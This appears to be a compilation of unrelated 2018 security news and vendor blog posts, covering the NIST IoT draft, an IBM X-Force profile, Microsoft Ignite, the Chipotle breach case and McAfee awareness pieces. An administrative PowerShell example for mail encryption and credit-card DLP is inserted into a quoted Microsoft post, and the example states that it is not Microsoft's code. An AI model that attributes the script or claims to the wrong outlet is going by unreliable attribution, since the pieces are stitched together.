The U.S. Department of Commerce’s National Institute of Standards and Technology recently announced that it is seeking public comment on Draft NISTIR 8228, Considerations for Managing Internet of Things (“IoT”) Cybersecurity and Privacy Risks (the “Draft Report”). The document is to be the first in a planned series of publications that will examine specific aspects of the IoT topic.

The Draft Report is designed “to help federal agencies and other organizations better understand and manage the cybersecurity and privacy risks associated with their IoT devices throughout their lifecycles.” According to the Draft Report, “[m]any organizations are not necessarily aware they are using a large number of IoT devices. It is important that organizations understand their use of IoT because many IoT devices affect cybersecurity and privacy risks differently than conventional IT devices do.”

The Draft Report identifies three high-level considerations with respect to the management of cybersecurity and privacy risks for IoT devices as compared to conventional IT devices: (1) many IoT devices interact with the physical world in ways conventional IT devices usually do not; (2) many IoT devices cannot be accessed, managed or monitored in the same ways conventional IT devices can; and (3) the availability, efficiency and effectiveness of cybersecurity and privacy capabilities are often different for IoT devices than for conventional IT devices. The Draft Report also identifies three high-level risk mitigation goals: (1) protect device security; (2) protect data security; and (3) protect individuals’ privacy.

In order to address those considerations and risk mitigation goals, the Draft Report provides the following recommendations:

  • Understand the IoT device risk considerations and the challenges they may cause to mitigating cybersecurity and privacy risks for devices in the appropriate risk mitigation areas.
  • Adjust organizational policies and processes to address the cybersecurity and privacy risk mitigation challenges throughout the IoT device lifecycle.
  • Implement updated mitigation practices for the organization’s IoT devices as you would any other changes to practices.

Comments are due by October 24, 2018.

How Nick Bradley Made a Career of Pursuing Bad Guys, From the Military to X-Force IRIS

These days, Nick Bradley is policing the world of cyberthreats in his role as practice lead of the IBM X-Force Incident Response and Intelligence Services (IRIS) Threat Analysis Group — but that wasn’t always the plan.

Nick comes from a multigenerational military family — his daughters are currently about to enter the service. Growing up in “middle of nowhere Florida,” there weren’t many options for Nick; he could either follow his family into the military or go to work at the local federal prison as a correctional officer. He pursued the best of both worlds by entering active duty with the Army military police, working his way to sergeant and switching to Reserves so he could study and become an officer, all the while maintaining a private hobby building computers and gaming.

One day, Nick came into work at the dispatch desk to find the computer switched off; it had a virus, the desk sergeant said, and they needed to wait for IT to come and fix it tomorrow.

“So I cleaned it up because I knew how to,” remembers Nick. “And it was something simple, too — it wasn’t some bleeding edge virus, it was one that had been out there forever. Back then, people had viruses on machines all the time. So I cleaned that up and went to work, didn’t think anything more of it.

“Then the next morning when all of the brass came in, I got called into the sergeant major’s office, and he wanted to know how I knew how to fix that computer.”

Changing Careers Under Orders

Nick’s personal tech interests ended up causing a major turn in his career. The brass told him he had a new job as a system administrator in the provost marshal’s office, and the rest is history.

“The thing was, in my mind, I still wanted to be military police, and so I was just doing this because that’s what they ordered me to do,” he says. “I even got accepted into the SWAT, or what the Army calls the SRT, and I did that on weekends so I could still be a cop.”

Nick later went to the Army Reserve and joined the Army R.O.T.C. program with the goal of becoming a commissioned officer. During that time, he also picked up some contract IT work to help pay the bills. Ultimately, it was this part-time job that led to a full-time career with Internet Security Systems — later acquired by IBM — and Nick decided not to commission back into active duty.

“It was an extremely hard decision because I love the military, but I realized I was going to be able to make a difference in this field that I never even knew existed, and that I was going to be able to provide a better life for my wife and kids.”

These days, Nick is still patrolling and protecting — he’s just a bit more desk-bound than he was while on active duty. Running the threat analysis group inside X-Force IRIS means Nick is in charge of the team that scours the net for signs of threats, turning it all into actionable intelligence not just for IBM clients, but for the world at large.

Quick to point out their role within a larger team — and that a lot of other groups contribute to the threat analysis — Nick explains how he and his X-Force IRIS colleagues identify issues. Using proprietary tools, the team scrapes the internet for text featuring keywords and information they find important: security patches being released, vulnerabilities exposed, breach disclosures and other info. They also have other groups within IBM they use as trusted sources, such as the incident response side of X-Force IRIS and IBM Trusteer, as well as external companies including Cisco Talos, Palo Alto Networks, Trend Micro and others.

Nick Bradley of IBM X-Force IRIS

Actionable Security Intelligence Beats the Bad Guys

“Our primary goal is to parse through all that noise and sort out what is hot versus what is just hype,” Nick says, explaining that the important information is made available through the team’s daily newsletter and through X-Force Exchange Collections.

“We don’t just want to be the person running around screaming ‘the sky is falling’ — we want to be the one telling you here’s where you go so you don’t get hurt. So we are always trying to share not just the intel, but also some form of action that can be taken, or actionable intelligence. That ranges from mitigation recommendations to actual indicators of compromise, what’s called IoC, and those can usually be directly loaded into protection platforms or into SIEMs.”

After nearly two decades watching threats and developing mitigations, Nick says the biggest thing that’s changed in cybersecurity is that the world now (finally!) takes it seriously. It used to be difficult to get a company to spend money on security; once they started seeing competitors suffer financial and reputational damage, though, that all changed.

But if the good news is that everyone has become more security-savvy, the flip side is that the “bad guys are getting more sophisticated as well,” Nick says. Plus, there’s now a “trickle-down” effect where high-level threat actors and advanced persistent threat (APT) groups release their tools onto the web, and lesser groups then access them to wreak their own havoc.

“One thing I think has significantly changed is the idea of hacking for infamy and glory,” says Nick. “For the longest time it was about compromising somebody and defacing their website — ‘you’ve been hacked, haha.’ It still happens, but that’s not the focus anymore. The focus now is espionage; it’s about money, sabotage, political agendas.”

All that must be hard for a guy from a law enforcement background. Nick says it was difficult at first to get used to mitigating, defending and protecting instead of directly going after the bad guys.

“That is a stark difference,” he says, “but I still think you make a better impact with protecting and defending than you would trying to go after individuals. We leave that to the FBI.”


The post How Nick Bradley Made a Career of Pursuing Bad Guys, From the Military to X-Force IRIS appeared first on Security Intelligence.

APTs are targeting IT service providers

Managed service providers (MSPs) and cloud service providers (CSPs) are under attack by advanced persistent threat (APT) groups, the U.S. Department of Homeland Security warns. “MSPs provide remote management of customer IT and end-user systems. MSPs generally have direct and unfettered access to their customers’ networks, and may store customer data on their own internal infrastructure. However, a compromise in one part of an MSP’s network can spread globally, affecting other customers and introducing risk,” … More

The post APTs are targeting IT service providers appeared first on Help Net Security.

Bridging the priority gap between IT and security in DevOps

Let’s start with a test. Suppose that you manage a corporate network gateway across which a critical programmed transaction is scheduled to occur in exactly one hour. Suppose further that the firewall protecting this gateway is functionally misbehaving and will almost certainly block any programmed activity with your transaction partner. This is a serious concern because your boss has reinforced to you several times the importance of this planned transaction. Your team continues to work … More

The post Bridging the priority gap between IT and security in DevOps appeared first on Help Net Security.

Most organizations believe hackers can penetrate their network

Radware released findings from its second annual web application security report, Radware 2018 State of Web Application Security. The report shares an in-depth view of the challenges organizations face in protecting web applications and how recent security breaches have affected them in the past year. In fact, it revealed that 67% of organizations believe hackers can still penetrate their network. The research focused on global companies and showed a growing frequency and complexity of application-layer … More

The post Most organizations believe hackers can penetrate their network appeared first on Help Net Security.

For some cloud services more than 75% of accounts are utilized by hackers

Researchers found that 21.57% of accounts originating from cloud service IP ranges appear to be fraudulent. Malicious accounts are eight times more likely to originate via cloud services than normal users. In fact, some cloud services and data centers can have more than 75% fraudulent accounts. The Q2 2018 DataVisor Fraud Index Report is a quarterly assessment of types and methods of online fraud in social platforms and financial services. The current report uses … More

The post For some cloud services more than 75% of accounts are utilized by hackers appeared first on Help Net Security.

The ultimate fallout from the Facebook data breach could be massive

Less than a week ago, Facebook announced that unknown attackers have managed to string together three bugs affecting the social media platform, which allowed them to steal access tokens of at least 50 million users – and likely more. The tokens allowed the attackers to take over victims’ Facebook accounts but could also have been used to log into accounts the victims opened on other websites and apps by using Facebook Login (i.e. using Facebook … More

The post The ultimate fallout from the Facebook data breach could be massive appeared first on Help Net Security.

APEC Cross-Border Privacy Rules Enshrined in U.S.-Mexico-Canada Trade Agreement

On September 30, 2018, the U.S., Mexico and Canada announced a new trade agreement (the “USMCA”) aimed at replacing the North American Free Trade Agreement. Notably, the USMCA’s chapter on digital trade recognizes “the economic and social benefits of protecting the personal information of users of digital trade” and will require the U.S., Canada and Mexico (the “Parties”) to each “adopt or maintain a legal framework that provides for the protection of the personal information of the users[.]” The frameworks should include key principles such as: limitations on collection, choice, data quality, purpose specification, use limitation, security safeguards, transparency, individual participation and accountability.

In adopting such a framework, Article 19.8(2) directs the Parties to consider the principles and guidelines of relevant international bodies, such as the APEC Privacy Framework and the OECD Recommendation of the Council concerning Guidelines Governing the Protection of Privacy and Transborder Flows of Personal Data, and Article 19.8(6) formally recognizes the APEC Cross-Border Privacy Rules (the “APEC CBPRs”) within their respective legal systems:

Art. 19.8(6) Recognizing that the Parties may take different legal approaches to protecting personal information, each Party should encourage the development of mechanisms to promote compatibility between these different regimes. The Parties shall endeavor to exchange information on the mechanisms applied in their jurisdictions and explore ways to extend these or other suitable arrangements to promote compatibility between them. The Parties recognize that the APEC Cross-Border Privacy Rules system is a valid mechanism to facilitate cross-border information transfers while protecting personal information.

In addition, Article 19.14(1)(b) provides that “the Parties shall endeavor to… cooperate and maintain a dialogue on the promotion and development of mechanisms, including the APEC Cross-Border Privacy Rules, that further global interoperability of privacy regimes.”

The APEC CBPRs were developed by the 21 APEC member economies as a cross-border transfer mechanism and comprehensive privacy program for private sector organizations to enable the accountable free flow of data across the APEC region. Organizations must be certified by a third-party APEC recognized Accountability Agent to participate in this system. The CBPRs are binding and enforceable against participating companies.

The USMCA must still pass the U.S. Congress, the Canadian Parliament, and the Mexican Senate.

You gotta fight, for your right, to erasure

According to Article 17 of the European Union’s General Data Protection Regulation (GDPR), all personal data that is no longer necessary must be removed and deleted. This aspect of the law, also known as “the right to erasure,” grants any user or customer the right to request that an organization deletes all data related or associated to them without undue delay, within 30 days. Moreover, the regulation carries heavy fines if a business does not … More

The post You gotta fight, for your right, to erasure appeared first on Help Net Security.

Latest Building Security In Maturity Model reflects software security initiatives of 120 firms

Synopsys released BSIMM9, the latest version of the Building Security In Maturity Model (BSIMM) designed to help organizations plan, execute, and measure their software security initiatives (SSIs). The ninth iteration of BSIMM reflects data collected over a 10-year study of real-world SSIs across 120 firms. “Development, security, and operations teams need to align, and BSIMM9 provides data suggesting this is taking place through automation, particularly as software shifts to the cloud,” said Dr. Brian Chess, … More

The post Latest Building Security In Maturity Model reflects software security initiatives of 120 firms appeared first on Help Net Security.

In terms of main threat actors, expectation rarely matches reality

Netwrix conducted a study of the major IT risks that are significant for most organizations and assessed respondents’ readiness to withstand cyber threats. The report is based on the feedback of 1,558 organizations of various sizes from many different regions and industries. It summarizes the experiences and plans the organizations have in regard to addressing six IT risks: physical damage, intellectual property theft, data loss, data breach, system disruption and compliance penalties. The report reveals … More

The post In terms of main threat actors, expectation rarely matches reality appeared first on Help Net Security.

Crypto-Security Testnet Surpasses Key Milestones

Security and micro-computing are a combination which has ascended to great relevance, both economically and financially, since the early days of commercial internet technology, the John McAfee-associated era of anti-virus software, and fears of ‘millennium-bug’ (‘Y2K’)-induced societal meltdowns. As a market player, ‘cybersecurity’ is hailed for its continued value and growth, with […]

The post Crypto-Security Testnet Surpasses Key Milestones appeared first on Hacked: Hacking Finance.

Google Announces 5 Major Security Updates for Chrome Extensions

Google has made several new announcements for its Chrome Web Store that aims at making Chrome extensions more secure and transparent to its users. Over a couple of years, we have seen a significant rise in malicious extensions that appear to offer useful functionalities, while running hidden malicious scripts in the background without the user's knowledge. However, the best part is that

Ignite 2018 highlights: passwordless sign-in, confidential computing, new threat protection, and more

What a week it was in Orlando! Ignite is always a biggie, and this one was no exception. For all of us here at Microsoft who get to work on security, spending time with customers to learn how you are using our security products today and to share new innovations to come is a highlight. At this year’s event we put even greater emphasis on providing attendees with access to engineering experts throughout more than one hundred focused sessions, workshops, and hands-on immersion experiences for the latest technologies in security. I was chuffed to see that our security booths at the center of the expo hall were chock-a-block for the whole event. Thank you to everyone who stopped by, attended our social and community events, and connected with our engineers and product managers.

After their security blanket work at the RSA Conference earlier this year, our social team once again took a shot at peak swag. Our Security SOCs were the result, lovingly designed and then crafted from the finest combed cotton, bringing fashion together with a six-month Enterprise Mobility + Security trial, quite the combination.

Show us your own fashion moment through social media with #askmeaboutmySOC #showmeyourSOC.

More seriously, if you weren’t able to join us this year, or found yourself trading off between sessions or workshops at the show, don’t worry, our breakout sessions on security are available on-demand. At Ignite 2018, we also brought a deep lineup of new security innovations that I have summarized below, along with some top session recommendations:

Identity and access management

We really don't like passwords, so together we want to help you eliminate their use through simpler, more secure alternatives. New support for passwordless sign-in to Azure Active Directory (Azure AD) connected apps, both cloud and on-premises, through the Microsoft Authenticator app can help you replace passwords with a more secure, multi-factor sign-in that can reduce compromise by 99.9 percent and significantly simplify the user experience. Watch the Ignite session: Getting to a world without passwords.

We also announced two powerful new features in our set of identity governance capabilities for Azure AD to help automate the process of granting access to employees and partners: Entitlement Management and My Access. Watch the Ignite session: Govern access to your resources with Azure AD identity governance. And read more about identity and access management announcements.

Information protection

As you move more of your workloads to the cloud, meeting information security and compliance standards needs a new approach. Azure is the first cloud platform to offer confidentiality and integrity of data while in use, adding to the protections already in place that help keep your data secure in transit and at rest. Azure confidential computing benefits are available soon on a new DC series of virtual machines in Azure, enabling trusted execution environments using Intel SGX chipsets to protect data while it's being computed. Watch the Ignite session: Protection by design: Intel SGX and Azure Confidential Computing.

We've also rolled out a new unified labeling experience in the Security & Compliance Center in Microsoft 365 that delivers a single, integrated approach to creating data sensitivity and data retention labels. You can preview new labeling capabilities that are built into Office apps across all major platforms and new extensions of labeling and protection capabilities to include PDFs. The Microsoft Information Protection SDK, now generally available, enables other software creators to enhance and build applications that understand, apply, and act on Microsoft sensitivity labels so you can have more cohesive information protection. Read more about the information protection announcements and watch the Ignite session.

Threat protection

Microsoft Threat Protection, announced at Ignite last week, is an integrated experience for detection, investigation, and remediation across endpoints, email, documents, identity, and infrastructure. This new integration in the Microsoft 365 admin console combines signal across all of Office 365 Advanced Threat Protection (ATP), Windows Defender ATP, Microsoft Cloud App Security, Azure AD Identity Protection, and the Azure Security Center to help you secure across your digital estate. The portal not only provides alerts and monitoring of threats, but also gives you the ability to make real-time policy changes to help your security strategy stay ahead of changing threats. Read more about Microsoft Threat Protection or watch the Ignite session.

Microsoft Cloud App Security can now leverage the traffic information collected by Windows Defender Advanced Threat Protection about the cloud apps and services being accessed from IT-managed Windows 10. This native integration provides admins a more complete view of cloud usage in their organization and easier investigative work. Read more about this integration or watch the Ignite session.

Security management

To help you strengthen your security posture, you'll want to understand your current position and where to go from there. Microsoft Secure Score is the only dynamic report card for cybersecurity. Organizations that use the Secure Score assessments and recommendations typically reduce their chance of a breach by 30-fold. Microsoft Secure Score provides guidance to improve your security posture. For example, Secure Score can recommend taking steps to secure your admin accounts with Multi-Factor Authentication (MFA), secure user accounts with MFA, and turn off client-side email forwarding rules. Starting today, we're expanding Secure Score to cover all of Microsoft 365. We are also introducing Secure Score for hybrid cloud workloads in the Azure Security Center, so you can have full visibility across your organization's entire estate. Read more about Microsoft Secure Score or watch the Ignite session.

Unified endpoint management

Customers using System Center Configuration Manager and Microsoft Intune to manage their existing infrastructure benefit immediately from the scale, reliability, and security of the cloud. We announced new capabilities for unified endpoint management (UEM) at Ignite to empower IT to secure your data across a variety of devices and platforms, and to help you deliver intuitive and native user experiences for Windows 10, iOS, and Android devices. Read more about all the UEM advancements or watch the Ignite session.

Looking ahead

Working closely with customers is at the center of our ability to innovate and evolve our security technologies. Ignite is a top-notch opportunity to build security community. It doesn't stop there though. We are always interested in your feedback as we roll out new capabilities; do join us and have your voice heard via the Tech Community.

The post Ignite 2018 highlights: passwordless sign-in, confidential computing, new threat protection, and more appeared first on Microsoft Secure.

Chipotle Consumer Plaintiffs’ Putative Class Case Survives in Part

On September 26, 2018, the U.S. District Court for the District of Colorado (“the Court”) refused to dismiss all putative class claims against Chipotle Mexican Grill, Inc. (“Chipotle”). This litigation arose from a 2017 data breach in which hackers stole customers’ payment card and other personal information by using malicious software to access the point-of-sale systems at Chipotle’s locations. 

Chipotle moved to dismiss all claims, arguing that two of the named plaintiffs – Plaintiff Lawson and Plaintiff Baker – lacked standing and that all other plaintiffs failed to state a claim. The motion was first considered by a United States Magistrate Judge, who recommended granting only part of Chipotle’s requested relief. Both Plaintiffs and Chipotle objected to portions of the recommendation. The District Court Judge agreed with the recommendation in part.

The Court first found that Plaintiff Lawson’s allegations of debit card misuse, time spent obtaining a new debit card, inability to receive cash back awards on certain purchases, and the cost to expedite delivery of a new card for impending travel all demonstrated injury in fact sufficient for standing. It also determined that more than just Plaintiff Baker’s name and payment card number may have been stolen, thus alleging facts sufficient to establish an impending injury.

The District Court Judge further found that certain allegations failed to state claims. Specifically, the Court dismissed claims for: (1) negligence; (2) negligence per se; (3) violation of the Colorado Consumer Protection Act; (4) unjust enrichment; and (5) violation of the Illinois Uniform Deceptive Trade Practices Act. However, the following claims survived Chipotle’s dismissal efforts: (1) breach of implied contract; (2) fraudulent omission claims (under Arizona, California, and Illinois consumer protection laws); (3) violation of California’s Unfair Competition Law; and (4) various damages claims (under California, Illinois, and Missouri consumer protection laws).

View Court’s Order.

It only takes one data point to blow open a threat investigation

Because cybersecurity has been such a pain point for businesses, it’s easy to assume that threat investigations are difficult and unwieldy to manage. When you consider what’s at stake—customer data, sensitive company and client information, and the financial costs of responding to a breach—the prospect of threat hunting can seem overwhelming. But the truth is, attackers can be just as vulnerable as the businesses they target. They get sloppy. They overlook their own vulnerabilities and … More

The post It only takes one data point to blow open a threat investigation appeared first on Help Net Security.

True password behaviors in the workplace revealed

LastPass released the “2018 Global Password Security Report,” revealing true password behaviors in the workplace and creating a benchmark that businesses can use to measure progress when investing in password security tools. The report, which analyzed anonymized data in over 43,000 companies of all sizes, industries, and geographies using LastPass as their business password manager, draws a picture of password management for the business IT community. “Security professionals often fail to consider the value of … More

The post True password behaviors in the workplace revealed appeared first on Help Net Security.

SIE Europe: Data sharing initiative to combat cybercrime launches

SIE Europe emerged from stealth mode to launch an initiative to enable European organisations to contribute and share Internet data. This consortium advances the detection and mitigation of phishing, malware and other targeted cyberattacks against their networks. Deutsche Telekom AG, one of the world’s leading integrated telecommunications companies, and DCSO Deutsche Cyber-Sicherheitsorganisation GmbH, a competence center and managed security service provider for the German economy, have signed agreements with SIE Europe UG to participate in … More

The post SIE Europe: Data sharing initiative to combat cybercrime launches appeared first on Help Net Security.

McAfee’s Most Dangerous Celebrities Study 2018: Ruby Rose Takes Center Stage

Every rose has its thorn, right? Apparently, the same goes for actress Ruby Rose, as her newfound popularity from “Orange is the New Black” has made her both famous, and maybe even dangerous. At least when it comes to online interactions. You heard correctly, the newly announced Batwoman has also been crowned McAfee’s Most Dangerous Celebrity this year. For the twelfth year in a row, McAfee researched famous individuals to reveal the riskiest celebrity to search for online, or, which search results could expose fans to malicious sites. Ruby Rose took home the top spot in 2018, but curious about who the runner-ups are? Here’s the full list:

Recent popular reality and sitcom shows have driven some stars (Kristin Cavallari, Debra Messing, Kourtney Kardashian) to the top of our list, which is one of the few reasons this list is so different than last year’s. Unlike 2017’s list of Most Dangerous Celebrities, musicians ranked low on this year’s list. Adele was the highest ranked musician at No. 21 followed by Shakira (No. 27), 2017’s top celebrity Avril Lavigne (No. 30), and Lady Gaga (No. 35).

So, whether you’re looking up what Ruby did on the latest “Orange is the New Black” episode, or what Kristin Cavallari wore to the latest awards show, make sure you’re searching the internet safely. To keep your internet activity secure and danger-free, follow these tips:

  • Be careful what you click. Users looking for a sneak-peek of the CW series Batwoman, starring Ruby Rose, should be cautious and only download directly from a reliable source. The safest thing to do is to wait for the official release instead of visiting a third-party website that could contain malware.
  • Apply system and application updates as soon as they are available. Very often the operating system and application updates include security fixes. Applying updates is an important step to help ensure devices stay protected.
  • Browse with security protection. McAfee Total Protection is a comprehensive security solution that can help keep devices protected against malware, phishing attacks, and other threats. It includes McAfee WebAdvisor which can help protect against going to malicious websites.
  • Use parental control software. Kids are fans of celebrities too, so ensure that limits are set on the child’s device and use software that can help minimize exposure to potentially malicious or inappropriate websites.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post McAfee’s Most Dangerous Celebrities Study 2018: Ruby Rose Takes Center Stage appeared first on McAfee Blogs.


Collaborate securely

This is a blog series that responds to common questions we receive from customers about deployment of Microsoft 365 security solutions. In this series you'll find context, answers, and guidance for deployment and driving adoption within your organization. Check out Protecting user identities, the fourth blog in our eight-blog series on deploying Intelligent Security Scenarios.


Your users can create, edit, and share a single document securely, even when working with multiple stakeholders, both inside and outside of your company. With Microsoft security solutions, users can identify, classify, track, and protect documents to prevent leaks and block access by unauthorized readers. These security measures travel with the document, making it easy and much less risky for stakeholders to download files.

How can I make it easier for groups of people to securely work on the same document?

Provide a common, secure identity for your employees, by first importing their user identities into Azure Active Directory (Azure AD). Then integrate your on-premises directories with Azure AD using Azure AD Connect, which allows you to create a common, secure identity for your users for Microsoft Office 365, Azure, and thousands of other software as a service (SaaS) applications that are integrated with Azure AD.

To make it easy for your employees to work securely with users from other organizations, enable Azure AD B2B collaboration capabilities. Now you can provide access to documents, resources, and applications to your partners while maintaining complete control over your own corporate data (see Figure 1). For your customers, Azure AD B2C lets you build identities on Windows, Android, and iOS devices, or for the web, and allow your customers’ users to sign in with their existing social accounts or personal emails.

Infographic detailing Azure Active Directory security.

Figure 1. Azure AD B2B collaboration enables organizations using Azure AD to work securely with users from other organizations while maintaining control over their own corporate data.

How can I protect organizational data when my users view, edit, and share documents?

Azure Information Protection enables you to configure policies and label a document to control who can see, edit, or share it. For example, a user could apply a Confidential label to a sensitive document that would then prevent it from being shared externally. You can also track who opened a document and where, and then determine what that person can do with the document after it's opened.

With Microsoft Data Loss Prevention (DLP) in Microsoft Exchange, you can take your information protection one step further and create rules that automatically identify sensitive content and apply the appropriate policy. For example, you can identify any document containing a credit card number that's stored in any OneDrive for Business site, or you can monitor just the OneDrive sites of specific people.

In addition to DLP, OneDrive for Business offers its own set of options for protecting and controlling the flow of organizational information. For example, you can block file syncing on unmanaged devices, audit actions on OneDrive for Business files, and use mobile device management policies to manage any device that connects to your organization's OneDrive for Business account. You can control as much or as little of your employee permissions as you need to.

How can I protect email?

The same Microsoft DLP capabilities above can be applied to email on Exchange Online to better control data in email and prevent accidental data leaks. Use Office 365 Message Encryption for email sent via Outlook.com, Yahoo!, Gmail, and other email services. Email message encryption helps you make sure that only intended recipients can view message content. Office 365 administrators can define message flow rules to determine the conditions for encryption. For example, a rule can require the encryption of all messages addressed to a specific recipient.
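The two rules described in this post, a DLP policy that flags credit card numbers in OneDrive for Business and a mail flow rule that encrypts every message to one recipient, as an added PowerShell example (not code from the Microsoft post). It assumes an ExchangeOnlineManagement session opened with Connect-ExchangeOnline (mail flow rules) and Connect-IPPSSession (compliance cmdlets); the recipient address, policy names and OneDrive site URL are placeholders.

```powershell
# Added example, not code from the Microsoft post. Assumes the ExchangeOnlineManagement
# module with Connect-ExchangeOnline (mail flow rules) and Connect-IPPSSession
# (Security & Compliance / DLP cmdlets) already run. Addresses, names and URLs
# are placeholders.

# --- 1) Office 365 Message Encryption via a mail flow (transport) rule ---
# Every message addressed to the named recipient gets the built-in "Encrypt"
# rights-protection template, so only that recipient can open the body.
New-TransportRule -Name "OME - encrypt mail to partner finance" `
    -SentTo "finance@partner.example" `
    -ApplyRightsProtectionTemplate "Encrypt" `
    -Comments "Added example: enforce encryption for one external recipient"

# --- 2) DLP policy for credit card numbers stored in OneDrive for Business ---
# "All" covers every OneDrive site. To monitor only specific people, pass their
# OneDrive site URLs instead, e.g. (placeholder tenant):
#   -OneDriveLocation "https://contoso-my.sharepoint.com/personal/alice_contoso_com"
# The policy starts in test mode so matches are logged and users are notified
# without enforcement; switch it to Enable once the rule has been tuned.
New-DlpCompliancePolicy -Name "OneDrive - credit card numbers" `
    -OneDriveLocation "All" `
    -Mode TestWithNotifications `
    -Comment "Added example: detect payment card numbers in OneDrive"

# The rule uses the built-in "Credit Card Number" sensitive information type and
# sends an incident report to the site admin on the first match. Access is not
# blocked in test mode; set -BlockAccess $true together with -Mode Enable later.
New-DlpComplianceRule -Name "Credit card number detected" `
    -Policy "OneDrive - credit card numbers" `
    -ContentContainsSensitiveInformation @{ Name = "Credit Card Number"; minCount = "1" } `
    -GenerateIncidentReport SiteAdmin `
    -BlockAccess $false

# Review what was created before moving the policy out of test mode.
Get-TransportRule "OME - encrypt mail to partner finance" |
    Format-List Name, SentTo, ApplyRightsProtectionTemplate
Get-DlpCompliancePolicy "OneDrive - credit card numbers" |
    Format-List Name, Mode, OneDriveLocation
```

Once the test-mode reports look right, `Set-DlpCompliancePolicy -Identity "OneDrive - credit card numbers" -Mode Enable` turns enforcement on.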

Deployment tips from our experts

Start by provisioning employee identities in Azure AD. Identity is the foundation for secure collaboration. Your first step is to import employee identities into Azure AD and then integrate your on-premises directories with Azure Active Directory using Azure AD Connect.

Collaborate securely with other organizations. With Azure AD B2B and Azure AD B2C capabilities, you can work securely with customers and partners.

Protect documents and emails. Help protect information through access control, classification, and labeling that extend to shared documents and external stakeholders with Azure Information Protection. Then define message flow rules in Office 365 Message Encryption to determine the conditions for email encryption.

Plan for success with Microsoft FastTrack. FastTrack comes with your subscription at no additional charge. Whether you're planning your initial rollout, needing to onboard your product, or driving user adoption, FastTrack is your benefit service that is ready to assist you. Get started at FastTrack for Microsoft 365.

Want to learn more?

For more information and guidance on this topic, check out the white paper Collaborate and share documents securely in real-time. You can find additional security resources on Microsoft.com.

Coming soon! Productive and Secure, the sixth installment of our Deploying Intelligent Scenarios series. In November, we will kick off a new series, Top 10 Security Deployment Actions with Microsoft 365 Security.


The post Collaborate securely appeared first on Microsoft Secure.

Cyber Defense Magazine – October 2018 has arrived. Enjoy it!

Cyber Defense Magazine October 2018 Edition has arrived.

Sponsored by: Bosch

We hope you enjoy this month’s edition…packed with 100+ pages of excellent content. InfoSec Knowledge is Power. We have 6 years of eMagazines online with timeless content. Visit our online library by clicking here. Please tell your friends to subscribe – no strings, always free emagazines:


Our Global Awards are annually given out at the IPEXPO EUROPE Conference as a global event in Europe every year, Q4.  GLOBAL 2018 Awards – CLOSED!  Winners will be announced in just a few days and our Global Print Edition will be out on the 3rd of October and we’ll release an electronic edition as well…

Our InfoSec awards are annually given out at the RSA Conference in the United States every year, Q1.  USA 2019 Awards – OPENING SOON!

MAGAZINES | TV | AWARDS, with our upcoming platform coming soon….

Sincerely,
TEAM CDM
Cyber Defense Magazine

We are all things Cyber Defense.  Thank you to our amazing readership!

Don’t forget to visit www.cyberdefense.tv – watch, learn & grow.

Pierluigi Paganini

(Security Affairs – hacking, Cyber Defense Magazine)

The post Cyber Defense Magazine – October 2018 has arrived. Enjoy it! appeared first on Security Affairs.

A final call for replacing security certificates using Symantec roots

Help Net Security sat down with Jeremy Rowley, Executive Vice President of Product at DigiCert. He leads the company’s product development teams serving its emerging markets clients that require security solutions for the Internet of Things, U.S. federal healthcare exchange, advanced Wi-Fi and other innovative technology sectors. The stable release of Google Chrome 70 is coming up this month. This means that sites with remaining Symantec certificates will be flagged as untrusted. What does this … More

The post A final call for replacing security certificates using Symantec roots appeared first on Help Net Security.

Organizations need to shift strategies, adopt a proactive approach to cybersecurity

The cybersecurity market has reached a point whereby organisations need to shift their strategies and have a new, proactive approach to their cybersecurity, according to a report by 451 Research. The hurdles that organizations need to overcome to successfully shift their strategies were identified as: a profusion of tools and data that complicates – and too often, frustrates – an effective strategy; an over-reliance on people to resolve security issues; and the unsustainable business model … More

The post Organizations need to shift strategies, adopt a proactive approach to cybersecurity appeared first on Help Net Security.

Quantifying a firm’s security levels may strengthen security over time

Cyberattacks grow in prominence each and every day; in fact, 2017 was the worst year to-date for data breaches, with the number of cyber incidents targeting businesses nearly doubling from 2016 to 2017. Now, new research from the UBC Sauder School of Business has quantified the security levels of more than 1,200 Pan-Asian companies in order to determine whether increased awareness of one’s security levels leads to improved defense levels against cybercrime. The study found … More

The post Quantifying a firm’s security levels may strengthen security over time appeared first on Help Net Security.

Explosion of look-alike domains aims to steal sensitive data from online shoppers

Venafi released research on the explosion of look-alike domains, which are routinely used to steal sensitive data from online shoppers. Venafi’s research analyzed suspicious domains targeting the top 20 retailers in five key markets: the U.S., U.K., France, Germany and Australia. As the rate of online shopping increases, customers are being targeted through look-alike domains. Cyber attackers create these fake domains by substituting a few characters in the URLs. Because they point to malicious online … More

The post Explosion of look-alike domains aims to steal sensitive data from online shoppers appeared first on Help Net Security.

Crypto Market Update: Japan’s Self-Regulatory Group (JVCEA) Readying Tighter Rules on Digital Assets

A group of cryptocurrency exchange operators in Japan is readying to tighten up measures following a recent cyber breach. The action follows a reported hack earlier in the month: cryptocurrency exchange Zaif lost an estimated $59.67 million. Self-Regulatory Group Set To Tighten Rules: The Japan Virtual Currency Exchange Association (JVCEA) is exploring new rules to safeguard against cyber […]

The post Crypto Market Update: Japan’s Self-Regulatory Group (JVCEA) Readying Tighter Rules on Digital Assets appeared first on Hacked: Hacking Finance.

#CyberAware: Will You Help Make the Internet a Safe Place for Families?

Don’t we all kinda secretly hope, even pretend, that our biggest fears are in the process of remedying themselves? Like believing that the police will know to stay close should we wander into a sketchy part of town. Or that our doors and windows will promptly self-lock should we forget to do so. Such a world would be ideal — and oh, so, peaceful — but it just isn’t reality. When it comes to making sure our families are safe we’ve got to be the ones to be aware, responsible, and take the needed action.

Our Shared Responsibility

This holds true in making the internet a safe place. As much as we’d like to pretend there’s a protective barrier between us and the bad guys online, there’s no single government entity that is solely responsible for securing the internet. Every individual must play his or her role in protecting their portion of cyberspace, including the devices and networks they use. And, that’s what October — National Cyber Security Awareness Month (NCSAM) — is all about.

At McAfee, we focus on these matters every day, but this month especially we are linking arms with safety organizations, bloggers, businesses, and YOU — parents, consumers, educators, and digital citizens — to zero in on ways we can all do our part to make the internet safe and secure for everyone. (Hey, sometimes the home team needs a huddle, right!?)

8 specific things you can do!

  1. Become a NCSAM Champion. The National Cyber Security Alliance (NCSA) is encouraging everyone — individuals, schools, businesses, government organizations, universities — to sign up, take action, and make a difference in online safety and security. It’s free and simple to register. Once you sign up you will get an email with a toolbox packed with fun, shareable memes to post for #CyberAware October.
